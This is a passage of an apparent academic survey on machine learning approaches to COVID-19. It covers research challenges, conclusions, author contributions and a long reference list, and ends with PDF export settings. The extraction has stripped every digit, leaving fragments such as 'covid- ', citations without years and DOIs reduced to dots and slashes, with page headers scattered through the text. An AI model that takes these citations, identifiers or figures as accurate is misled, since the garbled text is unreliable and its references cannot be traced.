challenge to data analytics, considering its limited information and geographical and temporal evolving of the recent epidemic. therefore, an accurate model for predicting the future behavior of a pandemic becomes challenging due to uncertainty (fong et al., ). we suggest that researchers propose a new pandemic forecasting model based on active learning in machine learning to reduce the level of uncertainty, typically accompanying new pandemics such as covid- . non-uniform pattern: liu et al. ( a) applied susceptible, exposed, infectious, recovered (seir) for modeling covid- . however, the seir model could not capture the complete number of infected cases, while the study ignored imported covid- confirmed cases. seir was based on the people’s natural distribution and cannot apply to welfare institute an example of different population distribution. the epidemiological chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ trend of covid- was not predicted accurately by the seir model under the viral mutation and specific ant-viral therapy development scenario. the seir model was unable to simulate non-uniform patterns, such as the issue of increasing medical professionals and bed capacity (liu et al., a). we suggest that researchers propose a machine- learning-based strategy for handling the non-uniform pattern in the future and consider all the other factors not considered in the study. insufficient regional data: adequate covid- data for a particular region are lacking because the capacity to gather reliable data is not uniform across regions worldwide. this situation can bring a challenge to the region without available covid- data. we suggest that researchers apply the cross-population train–test model because a model trained in a different region can be used to detect covid- in a different region. for example, the model trained to detect the new virus in wuhan, china, can be used in italy (santosh, ). image resolution: the resolution of the x-ray images affects the performance of the machine learning algorithm. dealing with low-resolution images typically poses a challenge to the machine learning approach. variable size of the resolution dimension has a negative effect. successful performance cannot be achieved if the input images of the data have different sizes. the original image resolution dimension, structured images, and stacking technique need to be the same (toğaçar, ergen & cömert, ). we suggest high-resolution x-ray images for developing covid- diagnostic and prognosis system with the ability to work with low-resolution x-ray images. outliers and noise: at the early phase of covid- , the covid- data contained many outliers and much noise (tuli et al., ). an outlier in data is a subset of the data that appears with inconsistencies from the remaining data. outliers typically lower the fit of a statistical model (bellazzi, guglielmann & ironi, ). the presence of outliers and noise in covid- makes predicting the correct number of covid- cases challenging (tuli et al., ). dealing with outliers and noise in data increases data engineering efforts and expenses. we suggest that researchers propose a robust machine learning approach that can effectively handle outliers and noise in covid- data. transparency and interpretability: the limitation of deep learning algorithms is a deficiency in terms of transparency and interpretability. for instance, knowing the image features that are applied to decide the output of the deep learning algorithms is not possible. the unique features used by the deep learning algorithm to differentiate covid- from cap cannot be sufficiently visualized by the heatmap, although the heatmap is used to visualize region in images that led to the algorithm output (li et al., b). images, especially x-rays and ct scans, are heavily relied on in detecting covid- . we suggest that researchers propose explainable deep learning algorithms for the detection of covid- to instill transparency and interpretation in deep learning algorithms. misdiagnosis: the application of a deep learning algorithm to detect covid- on a chest ct scan has the possibility of misdiagnosis (wu et al., ) because of the similarity of the covid- symptoms with other types of pneumonia (belfiore et al., ). chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ incorrect diagnoses can mislead the health professional in deciding and lead to inappropriate medication, further complicating the health condition of the patient with covid- . we suggest that researchers combine the ct scan diagnosis using deep learning algorithm with clinical information such as the nucleic acid detection results, clinical symptoms, epidemiology, and laboratory indicators to avoid misdiagnosis (wu et al., ). resource allocation: resource allocation is a challenge as the covid- pandemic keeps spreading because the increase in the number of patients means more resources are required to take care of them. the allocation of limited resources in a rapidly expanding pandemic entails a difficult decision for the distribution of scarce resources (jiang et al., ). the epicenters of the covid- are challenged with resource problems of shortage of beds, gowns, masks, medical staff, and ventilators (ahuja, reddy & marques, ). we propose the development of a machine learning decision support system to help in crucial decisions on resource allocation. conclusions in this study, we propose a survey, including a bibliometric analysis of the adoption of machine learning, to fight covid- . the concise summary of the projects that adopted machine learning to fight covid- , sources of covid- datasets, new comprehensive taxonomy, synthesis and analysis, and bibliometric analysis is presented. the results reveal that covid- diagnostic tools received the most considerable attention from researchers, and energy and resources are more dispensed toward automated covid- diagnostic tools. by contrast, covid- drugs and vaccine development remain grossly underexploited. the algorithm predominantly utilized by the researchers in developing the diagnostic tool is cnn mainly from x-rays and ct scan images. the most suitable cnn architecture for the detection of covid- from the x-ray and ct scan images is resnet. the challenges hindering practical work on machine learning to fight covid- and a new perspective to solve the identified problems are presented in the study. we believe that our survey with bibliometric analysis could enable researchers to determine areas that need further development and identify potential collaborators at author, country, and institutional levels. based on the bibliometric analysis conducted on the global scientific research output on covid- disease spread and preventive measures, the analysis results reveal that most of the research outputs were published in prestigious journals with high influence factors. these journals include the lancet, journal of medical virology, and eurosurveillance. the bibliometric analysis also shows the focused subjects in various aspects of covid- infection transmission, diagnosis, treatment, prevention, and its complications. other prominent features include strong collaboration among research institutions, universities, and co-authorships among researchers across the globe. machine learning algorithms have many practical applications in medicine, and novel contributions from different researchers are still evolving and growing exponentially in a bid to satisfy the essential clinical needs of the individual patients, as it is the case with its application to fighting the covid- pandemic. as a way forward, we suggest an chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in-depth machine learning application review that would focus on the critical analysis of the novel coronavirus disease and other related cases of global pandemics. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare that they have no competing interests. author contributions � haruna chiroma conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � absalom e. ezugwu conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � fatsuma jauro performed the experiments, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � mohammed a. al-garadi performed the experiments, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � idris n. abdullahi performed the experiments, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � liyana shuib performed the experiments, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: all raw data are contained in the methodology and in table . references ahuja as, reddy vp, marques o. . artificial intelligence and covid- : a multidisciplinary approach. integrative medicine research ( ): doi . /j.imr. . . ai t, yang z, hou h, zhan c, chen c, lv w, tao q, sun z, xia l. . correlation of chest ct and rt-pcr testing in coronavirus disease (covid- ) in china: a report of cases. radiology ( ):e –e doi . /radiol. . alimadadi a, aryal s, manandhar i, munroe pb, joe b, cheng x. . artificial intelligence and machine learning to fight covid- . physiological genomics ( ): – doi . /physiolgenomics. . . apostolopoulos id, mpesiana ta. . covid- : automatic detection from x-ray images utilizing transfer learning with convolutional neural networks. physical and engineering sciences in medicine : – doi . /s - - - . ardakani aa, kanafi ar, acharya ur, khadem n, mohammadi a. . application of deep learning technique to manage covid- in routine clinical practice using ct images: results of chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.imr. . http://dx.doi.org/ . /radiol. http://dx.doi.org/ . /physiolgenomics. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ convolutional neural networks. computers in biology and medicine : doi . /j.compbiomed. . . asif s, wenhui y. . automatic detection of covid- using x-ray images with deep convolutional neural networks and machine learning. computers in biology and medicine : doi . /j.compbiomed. . . ayyoubzadeh sm, ayyoubzadeh sm, zahedi h, ahmadi m, kalhori srn. . predicting covid- incidence through analysis of google trends data in iran: data mining and deep learning pilot study. jmir public health and surveillance ( ):e doi . / . barbosa rdm, fernandes ma. . chaos game representation dataset of sars-cov- genome. data in brief : doi . /j.dib. . . basheer ia, hajmeer m. . artificial neural networks: fundamentals, computing, design, and application. journal of microbiological methods ( ): – . belfiore mp, urraro f, grassi r, giacobbe g, patelli g, cappabianca s, reginelli a. . artificial intelligence to codify lung ct in covid- patients. in: giovagnoni a, ed. la radiologia medica. berlin: springer, – . bellazzi r, guglielmann r, ironi l. . qualitative and fuzzy reasoning for identifying non-linear physiological systems: an application to intracellular thiamine kinetics. in: th international workshop on intelligent data analysis in medicine and pharmacology. bernheim a, mei x, huang m, yang y, fayad za, zhang n, diao k, lin b, zhu x, li k, li s, shan h, jacobi a, chung m. . chest ct findings in coronavirus disease- (covid- ): relationship to duration of infection. radiology ( ): doi . /radiol. . butt c, gill j, chun d, babu ba. . deep learning system to screen coronavirus disease pneumonia. applied intelligence epub ahead of print april doi . /s - - - . casey b. . how good is radiography for covid- detection? available at auntminnie.com. chahrour m, assi s, bejjani m, nasrallah aa, salhab h, fares m, khachfe hh. . a bibliometric analysis of covid- research activity: a call for increased output. cureus ( ):e . chimmula vkr, zhang l. . time series forecasting of covid- transmission in canada using lstm networks. chaos, solitons & fractals : . corman vm, landt o, kaiser m, molenkamp r, meijer a, chu dk, bleicker t, brünink s, schneider j, schmidt ml, mulders dg, haagmans bl, van der veer b, van den brink s, wijsman l, goderski g, romette j-l, ellis j, zambon m, peiris m, goossens h, reusken c, koopmans mp, drosten c. . detection of novel coronavirus ( -ncov) by real-time rt-pcr. euro surveillance ( ): . dananjayan s, raj gm. . artificial intelligence during a pandemic: the covid- example. international journal of health planning and management ( ): – doi . /hpm. . das km, lee ey, singh r, enani ma, al dossari k, van gorkom k, larsson sg, langer rd. . follow-up chest radiographic findings in patients with mers-cov after recovery. indian journal of radiology and imaging ( ): doi . /ijri.ijri_ _ . deng l. . a tutorial survey of architectures, algorithms, and applications for deep learning. apsipa transactions on signal and information processing : – . dong d, tang z, wang s, hui h, gong l, lu y, xue z, liao h, chen f, yang f, jin r, wang k, liu z, wei j, mu w, zhang h, jiang j, tian j, li h. . the role of imaging in the detection chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.compbiomed. . http://dx.doi.org/ . /j.compbiomed. . http://dx.doi.org/ . / http://dx.doi.org/ . /j.dib. . http://dx.doi.org/ . /radiol. http://dx.doi.org/ . /s - - - auntminnie.com http://dx.doi.org/ . /hpm. http://dx.doi.org/ . /ijri.ijri_ _ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ and management of covid- : a review. ieee reviews in biomedical engineering epub ahead of print april doi . /rbme. . . duan yn, qin j. . pre-and posttreatment chest ct findings: novel coronavirus ( -ncov) pneumonia. radiology ( ): doi . /radiol. . elavarasan rm, pugazhendhi r. . restructured society and environment: a review on potential technological strategies to control the covid- pandemic. science of the total environment : doi . /j.scitotenv. . . fang y, zhang h, xie j, lin m, ying l, pang p, ji w. . sensitivity of chest ct for covid- : comparison to rt-pcr. radiology ( ):e –e doi . /radiol. . farhat h, sakr ge, kilany r. . deep learning applications in pulmonary medical imaging: recent updates and insights on covid- . machine vision and applications ( ): – doi . /s - - - . fong sj, li g, dey n, crespo rg, herrera-viedma e. . composite monte carlo decision making under high uncertainty of novel coronavirus epidemic using hybridized deep learning and fuzzy rule induction. applied soft computing : . gonzalez-dias p, lee ek, sorgi s, de lima ds, urbanski ah, silveira el, nakaya hi. . methods for predicting vaccine immunogenicity and reactogenicity. human vaccines & immunotherapeutics ( ): – doi . / . . . gorbalenya ae. . severe acute respiratory syndrome-related coronavirus: the species and its viruses, a statement of the coronavirus study group. biorxiv doi . / . . . . greff k, srivastava rk, koutn j, steunebrink br, schmidhuber j. . lstm: a search space odyssey. ieee transactions on neural networks and learning systems ( ): – doi . /tnnls. . . guan wj, ni zy, hu y, liang wh, ou cq, he jx, liu l, shan h, lie l, hui dsc, du b, li l, zeng g, yuen ky, chen rc, tang cl, wang t, chen py, xiang j, li sy, wang jl, liang zl, peng yx, wei l, liu y, hu y, peng p, wang jm, liu jy, chen z, li g, zheng zj, qui sq, luo j, ye cy, zhu sy, zhong ns. . clinical characteristics of coronavirus disease in china. new england journal of medicine ( ): – doi . /nejmoa . haque iri, neubert j. . deep learning approaches to biomedical image segmentation. informatics in medicine unlocked : doi . /j.imu. . . holshue ml, debolt c, lindquist s, lofy kh, wiesman j, bruce h, spitters c, ericson k, wilkerson s, tural a, diaz g, cohn a, fox la, patel a, gerber si, kim l, tong s, lu x, lindstrom s, pallansch ma, weldon wc, biggs hm, uyeki tm, pillai sk. . first case of novel coronavirus in the united states. new england journal of medicine ( ): – doi . /nejmoa . hossain mm. . current status of global research on novel coronavirus disease (covid- ): a bibliometric analysis and knowledge mapping. f research : doi . /f research. . . hu s, gao y, niu z, jiang y, li l, xiao x, wang m, fang ef, menpes-smith w, xia j, ye h, yang g. . weakly supervised deep learning for covid- infection detection and classification from ct images. ieee access : – doi . /access. . . huang c, wang y, li x, ren l, zhao j, hu y, zhang l, fan g, xu j, gu x, cheng z, yu t, xia j, wei y, wu w, xie x, yin w, li h, liu m, xiao y, gao h, guo l, xie j, wang g, jiang r, gao z, jin q, wang j, cao b. a. clinical features of patients infected with novel coronavirus in wuhan, china. lancet ( ): – doi . /s - ( ) - . chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /rbme. . http://dx.doi.org/ . /radiol. http://dx.doi.org/ . /j.scitotenv. . http://dx.doi.org/ . /radiol. http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / . . http://dx.doi.org/ . / . . . http://dx.doi.org/ . /tnnls. . http://dx.doi.org/ . /nejmoa http://dx.doi.org/ . /j.imu. . http://dx.doi.org/ . /nejmoa http://dx.doi.org/ . /f research. . http://dx.doi.org/ . /access. . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ huang l, han r, ai t, yu p, kang h, tao q, xia l. b. serial quantitative chest ct assessment of covid- : deep-learning approach. radiology: cardiothoracic imaging ( ):e doi . /ryct. . hui ds, azhar ei, madani ta, ntoumi f, kock r, dar o, ippolito g, mchugh td, memish za, drosten c, zumla a, petersen e. . the continuing -ncov epidemic threat of novel coronaviruses to global health: the latest novel coronavirus outbreak in wuhan, china. international journal of infectious diseases : – doi . /j.ijid. . . . hurt b, kligerman s, hsiao a. . deep learning localization of pneumonia: coronavirus (covid- ) outbreak. journal of thoracic imaging ( ):w –w doi . /rti. . imai n, dorigatti i, cori a, donnelly c, riley s, ferguson n. . report : estimating the potential total number of novel coronavirus cases in wuhan city, china. imperial college london epub ahead of print january doi . / . inui s, fujikawa a, jitsu m, kunishima n, watanabe s, suzuki y, umeda s, uwabe y. . chest ct findings in cases from the cruise ship “diamond princess” with coronavirus disease (covid- ). radiology: cardiothoracic imaging ( ):e doi . /ryct. . jaiswal a, gianchandani n, singh d, kumar v, kaur m. . classification of the covid- infected patients using densenet based deep transfer learning. journal of biomolecular structure and dynamics epub ahead of print july doi . / . . . jiang x, coffee m, bari a, wang j, jiang x, shi j, dai j, cai j, zhang t, wu z, he g, huang y. . towards an artificial intelligence framework for data-driven prediction of coronavirus clinical severity. computers, materials & continua ( ): – doi . /cmc. . . karim f, majumdar s, darabi h, chen s. . lstm fully convolutional networks for time series classification. ieee access : – doi . /access. . . ke yy, peng tt, yeh tk, huang wz, chang se, wu sh, hung hc, hsu ta, lee sj, song js, lin wh, chiang tj, lin jh, sytwu hk, chen ct. . artificial intelligence approach fighting covid- with repurposing drugs. biomedical journal ( ): – doi . /j.bj. . . . klein sl, jedlicka a, pekosz a. . the xs and y of immune responses to viral vaccines. lancet infectious diseases ( ): – doi . /s - ( ) - . kooraki s, hosseiny m, myers l, gholamrezanezhad a. . coronavirus (covid- ) outbreak: what the department of radiology should know. journal of the american college of radiology ( ): – doi . /j.jacr. . . . kumar a, gupta pk, srivastava a. . a review of modern technologies for tackling covid- pandemic. diabetes & metabolic syndrome: clinical research & reviews ( ): – doi . /j.dsx. . . . lecun y, bengio y, hinton g. . deep learning. nature ( ): – doi . /nature . li d, wang d, dong j, wang n, huang h, xu h, xia c. a. false-negative results of real-time reverse-transcriptase polymerase chain reaction for severe acute respiratory syndrome coronavirus : role of deep-learning-based ct diagnosis and insights from two cases. korean journal of radiology ( ): – doi . /kjr. . . li l, qin l, xu z, yin y, wang x, kong b, bai j, lu y, fang z, song q, cao k, liu d, wang g, xu q, fang x, zhang s, xia j, xia j. b. artificial intelligence distinguishes covid- from community acquired pneumonia on chest ct. radiology ( ): . chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /ryct. http://dx.doi.org/ . /j.ijid. . . http://dx.doi.org/ . /rti. http://dx.doi.org/ . / http://dx.doi.org/ . /ryct. http://dx.doi.org/ . / . . http://dx.doi.org/ . /cmc. . http://dx.doi.org/ . /access. . http://dx.doi.org/ . /j.bj. . . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /j.jacr. . . http://dx.doi.org/ . /j.dsx. . . http://dx.doi.org/ . /nature http://dx.doi.org/ . /kjr. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ li z, zhong z, li y, zhang t, gao l, jin d, sun y, ye x, yu l, hu z, xiao j, huang l, tang y. c. from community acquired pneumonia to covid- : a deep learning based method for quantitative analysis of covid- on thick-section ct scans. european radiology ( ): – doi . /s - - -x. liu f, zhang q, huang c, shi c, wang l, shi n, fang c, shan f, mei x, shi j, song f, yang z, ding z, su x, lu h, zhu t, zhang z, shi l, shi j. a. ct quantification of pneumonia lesions in early days predicts progression to severe illness in a cohort of covid- patients. theranostics ( ): – doi . /thno. . liu g, xu yan, he z, rao y, xia j, fan l. . deep learning-based channel prediction for edge computing networks toward intelligent connected vehicles. ieee access : – doi . /access. . . liu z, huang s, lu w, su z, yin x, liang h, zhang h. b. modeling the trend of coronavirus disease and restoration of operational capability of metropolitan medical service in china: a machine learning and mathematical model-based analysis. global health research and policy ( ): – doi . /s - - - . livingstone dj. . artificial neural networks: methods and applications. totowa: humana press. loey m, smarandache f, khalifa nem. . within the lack of chest covid- x-ray dataset: a novel detection model based on gan and deep transfer learning. symmetry ( ): doi . /sym . lou j, tian sj, niu sm, kang xq, lian hx, zhang lx, zhang jj. . coronavirus disease : a bibliometric analysis and review. european review for medical and pharmacological sciences ( ): – . mei x, lee hc, diao ky, huang m, lin b, liu c, xie z, ma y, robson pm, chung m, bernheim a, mani v, calcagno c, li k, li s, shan h, lv j, zhao t, xia j, long q, steinberger s, jacobi a, deyer t, luksza m, liu f, little bp, fayad za, yang y. . artificial intelligence-enabled rapid diagnosis of patients with covid- . nature medicine : – . mohammadi m, al-fuqaha a, sorour s, guizani m. . deep learning for iot big data and streaming analytics: a survey. ieee communications surveys & tutorials ( ): – doi . /comst. . . oh y, park s, ye jc. . deep learning covid- features on cxr using limited training data sets. ieee transactions on medical imaging ( ): – doi . /tmi. . . ozturk t, talo m, yildirim ea, baloglu ub, yildirim o, acharya ur. . automated detection of covid- cases using deep neural networks with x-ray images. computers in biology and medicine : doi . /j.compbiomed. . . pan f, ye t, sun p, gui s, liang b, li l, zheng d, wang j, hesketh rl, yang l, zheng c. . time course of lung changes on chest ct during recovery from novel coronavirus (covid- ) pneumonia. radiology : . park y, casey d, joshi i, zhu j, cheng f. . emergence of new disease-how can artificial intelligence help? trends in molecular medicine ( ): – doi . /j.molmed. . . . patel a, jernigan db, -ncov cdc response team. . initial public health response and interim clinical guidance for the novel coronavirus outbreak—united states, december , –february , . morbidity and mortality weekly report ( ): – doi . /mmwr.mm e . chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /s - - -x http://dx.doi.org/ . /thno. http://dx.doi.org/ . /access. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /sym http://dx.doi.org/ . /comst. . http://dx.doi.org/ . /tmi. . http://dx.doi.org/ . /j.compbiomed. . http://dx.doi.org/ . /j.molmed. . . http://dx.doi.org/ . /mmwr.mm e http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ peng qy, wang xt, zhang ln, chinese critical care ultrasound study group. . findings of lung ultrasonography of novel corona virus pneumonia during the – epidemic. intensive care medicine ( ): – doi . /s - - - . pirouz b, shaffiee haghshenas s, shaffiee haghshenas s, piro p. . investigating a serious challenge in the sustainable development process: analysis of confirmed cases of covid- (new type of coronavirus) through a binary classification using artificial intelligence and regression analysis. sustainability ( ): . pouyanfar s, sadiq s, yan y, tian h, tao y, reyes mp, shyu m, chen s, iyengar ss. . a survey on deep learning: algorithms, techniques, and applications. acm computing surveys ( ): – doi . / . qiang xl, xu p, fang g, liu wb, kou z. . using the spike protein feature to predict infection risk and monitor the evolutionary dynamic of coronavirus. infectious diseases of poverty ( ): – doi . /s - - - . rahaman mm, li c, yao y, kulwa f, rahman ma, wang q, qi s, kong f, zhu x, zhao x. . identification of covid- samples from chest x-ray images using deep learning: a comparison of transfer learning approaches. journal of x-ray science and technology ( ): – . randhawa gs, soltysiak mp, el roz h, de souza cp, hill ka, kari l. . machine learning using intrinsic genomic signatures for rapid classification of novel pathogens: covid- case study. plos one ( ):e doi . /journal.pone. . rao ass, vazquez ja. . identification of covid- can be quicker through artificial intelligence framework using a mobile phone–based survey when cities and towns are under quarantine. infection control & hospital epidemiology epub ahead of print march doi . /ice. . . read jm, bridgen jr, cummings da, ho a, jewell cp. . novel coronavirus -ncov: early estimation of epidemiological parameters and epidemic predictions. medrxiv doi . / . . . . ribeiro mhdm, da silva rg, mariani vc, dos santos coelho l. . short-term forecasting covid- cumulative confirmed cases: perspectives for brazil. chaos, solitons & fractals : doi . /j.chaos. . . rodrigues jcl, hare ss, devaraj a, jacob j, johnstone a, mcstay r, nair a, robinson g. . an update on covid- for the radiologist-a british society of thoracic imaging statement. clinical radiology ( ): – . rodriguez-morales aj, cardona-ospina ja, gutiérrez-ocampo e, villamizar-peña r, holguin-rivera y, escalera-antezana jp, alvarado-arnez le, bonilla-aldana dk, franco-paredes c, henao-martinez af, paniz-mondolfi a, lagos-grisales gj, ramírez-vallejo e, suárez ja, zambrano li, villamil-gómez we, balbin-ramon gj, rabaan aa, harapan h, dhama k, nishiura h, kataoka h, ahmad t, latin american network of coronavirus disease -covid- research (lancovid- ). . clinical, laboratory and imaging features of covid- : a systematic review and meta-analysis. travel medicine and infectious disease : doi . /j.tmaid. . . sak h, senior a, beaufays f. . long short-term memory recurrent neural network architectures for large scale acoustic modeling has. in: fifteenth annual conference of the international speech communication association. salman fm, abu-naser ss, alajrami e, abu-nasser bs, alashqar ba. . covid- detection using artificial intelligence. international journal of academic engineering research (ijaer) ( ): – . chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /ice. . http://dx.doi.org/ . / . . . http://dx.doi.org/ . /j.chaos. . http://dx.doi.org/ . /j.tmaid. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ santosh kc. . ai-driven tools for coronavirus outbreak: need of active learning and cross-population train/test models on multitudinal/multimodal data. journal of medical systems ( ): – doi . /s - - -x. shi f, wang j, shi j, wu z, wang q, tang z, he k, shi y, shen d. . review of artificial intelligence techniques in imaging data acquisition, segmentation and diagnosis for covid- . ieee reviews in biomedical engineering epub ahead of print april doi . /rbme. . . singh d, kumar v, kaur m. . classification of covid- patients from chest ct images using multi-objective differential evolution-based convolutional neural networks. european journal of clinical microbiology & infectious diseases epub ahead of print april doi /s - - -z. singh d, kumar v, yadav v, kaur m. . deep convolutional neural networks based classification model for covid- infected patients using chest x-ray images. international journal of pattern recognition and artificial intelligence : doi . /s . stewart ka, navarro sm, kambala s, tan g, poondla r, lederman s, barbour k, lavy c. . trends in ultrasound use in low and middle income countries: a systematic review. international journal of maternal and child health and aids ( ): . tiwari s, kumar s, guleria k. . outbreak trends of coronavirus disease– in india: a prediction. disaster medicine and public health preparedness epub ahead of print april doi . /dmp. . . toğaçar m, ergen b, cömert z. . covid- detection using deep learning models to exploit social mimic optimization and structured chest x-ray images using fuzzy color and stacking approaches. computers in biology and medicine : doi . /j.compbiomed. . . tuli s, tuli s, tuli r, gill ss. . predicting the growth and trend of covid- pandemic using machine learning and cloud computing. internet of things : doi . /j.iot. . . tummers j, catal c, tobi h, tekinerdogan b, leusink g. . coronaviruses and people with intellectual disability: an exploratory data analysis. journal of intellectual disability research ( ): – doi . /jir. . ucar f, korkmaz d. . covidiagnosis-net: deep bayes-squeezenet based diagnostic of the coronavirus disease (covid- ) from x-ray images. medical hypotheses : doi . /j.mehy. . . vaid s, cakan c, bhandari m. . using machine learning to estimate unobserved covid- infections in north america. journal of bone and joint surgery epub ahead of print may doi /jbjs. . . vaishya r, javaid m, khan ih, haleem a. . artificial intelligence (ai) applications for covid- pandemic. diabetes & metabolic syndrome: clinical research & reviews ( ): – doi . /j.dsx. . . . wang w, xu y, gao r, lu r, han k, wu g, tan w. a. detection of sars-cov- in different types of clinical specimens. jama ( ): – doi . /jama. . . wang y, dong c, hu y, li c, ren q, zhang x, shi h, zhou m. b. temporal changes of ct findings in patients with covid- pneumonia: a longitudinal study. radiology : doi . /radiol. . weidt f, silva r. . systematic literature review in computer science-a practical guide. relatórios técnicos do dcc/ufjf doi . /rg. . . . . chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /s - - -x http://dx.doi.org/ . /rbme. . http://dx.doi.org/ . /s - - -z http://dx.doi.org/ . /s http://dx.doi.org/ . /dmp. . http://dx.doi.org/ . /j.compbiomed. . http://dx.doi.org/ . /j.iot. . http://dx.doi.org/ . /jir. http://dx.doi.org/ . /j.mehy. . http://dx.doi.org/ . /jbjs. . http://dx.doi.org/ . /j.dsx. . . http://dx.doi.org/ . /jama. . http://dx.doi.org/ . /radiol. http://dx.doi.org/ . /rg. . . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ wen z, chi y, zhang l, liu h, du k, li z, chen j, cheng l, wang d. . coronavirus disease : initial detection on chest ct in a retrospective multicenter study of chinese subjects. radiology: cardiothoracic imaging ( ):e doi . /ryct. . wong hyf, lam hys, fong aht, leung st, chin twy, lo csy, lui mm-s, lee jcy, chiu kw-h, chung tw-h, lee eyp, wan eyf, hung ifn, lam tpw, kuo md, ng m-y. . frequency and distribution of chest radiographic findings in covid- positive patients. radiology ( ):e –e doi . /radiol. . world health organization. . novel coronavirus ( -ncov): situation report, . geneva: who. available at https://reliefweb.int/report/china/novel-coronavirus- -ncov-situation- report- - -january- . wu x, hui h, niu m, li l, wang l, he b, yang x, li l, li h, tian j, zha y. . deep learning-based multi-view fusion model for screening novel coronavirus pneumonia: a multicentre study. european journal of radiology : doi . /j.ejrad. . . wynants l, van calster b, collins gs, riley rd, heinze g, schuit e, bonten mmj, debray tpa, de vos m, dhiman p, haller mc, henckaerts l, kreuzberger n, luijken lohman a, ma k, andaur j, reitsma cl, sergeant jb, skoetz jc, snel c, smits n, snell kie, sperrin m, steyerberg ew, takada t, van kuijk smj, van royen fs, wallisch c, hooft l, moons kgm, van smeden m. . prediction models for diagnosis and prognosis of covid- infection: systematic review and critical appraisal. bmj :m doi . /bmj.m . xie x, zhong z, zhao w, zheng c, wang f, liu j. . chest ct for typical -ncov pneumonia: relationship to negative rt-pcr testing. radiology ( ):e –e doi . /radiol. . xu x, yu c, qu j, zhang l, jiang s, huang d, chen b, zhang z, guan w, ling z, jiang r, hu t, ding y, lin l, gan q, luo l, tang x, liu j. . imaging and clinical features of patients with novel coronavirus sars-cov- . european journal of nuclear medicine and molecular imaging - ( ): – doi . /s - - - . yang s, jiang l, cao z, wang l, cao j, feng r, zhang z, xue x, shi y, shan f. a. deep learning for detecting corona virus disease (covid- ) on high-resolution computed tomography: a pilot study. annals of translational medicine ( ): doi . /atm. . . . yang z, zeng z, wang k, wong ss, liang w, zanin m, liu p, cao x, gao z, mai z, liang j, liu x, li s, li y, ye f, guan w, yang y, li f, luo s, xie y, liu b, wang z, zhang s, wang y, zhong n, he j. b. modified seir and ai prediction of the epidemics trend of covid- in china under public health interventions. journal of thoracic disease ( ): – doi . /jtd. . . . yuen ks, ye zw, fung sy, chan cp, jin dy. . sars-cov- and covid- : the most important research questions. cell & bioscience ( ): – doi . /s - - - . zhao r, yan r, chen z, mao k, wang p, gao rx. . deep learning and its applications to machine health monitoring. mechanical systems and signal processing : – doi . /j.ymssp. . . . zhao z, chen w, wu x, chen pcy, liu j. . lstm network : a deep learning approach for short-term traffic forecast. iet intelligent transport systems ( ): – . zu zy, jiang md, xu pp, chen w, ni qq, lu gm, zhang lj. . coronavirus disease (covid- ): a perspective from china. radiology ( ):e –e doi . /radiol. . chiroma et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /ryct. http://dx.doi.org/ . /radiol. https://reliefweb.int/report/china/novel-coronavirus- -ncov-situation-report- - -january- https://reliefweb.int/report/china/novel-coronavirus- -ncov-situation-report- - -january- http://dx.doi.org/ . /j.ejrad. . http://dx.doi.org/ . /bmj.m http://dx.doi.org/ . /radiol. http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /atm. . . http://dx.doi.org/ . /jtd. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.ymssp. . . http://dx.doi.org/ . /radiol. https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. early survey with bibliometric analysis on machine learning approaches in controlling covid- outbreaks introduction methodology theoretical background of machine learning algorithms covid- machine learning adoption-oriented perspective covid- datasets survey and bibliometric analysis challenges and future research opportunities conclusions references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true 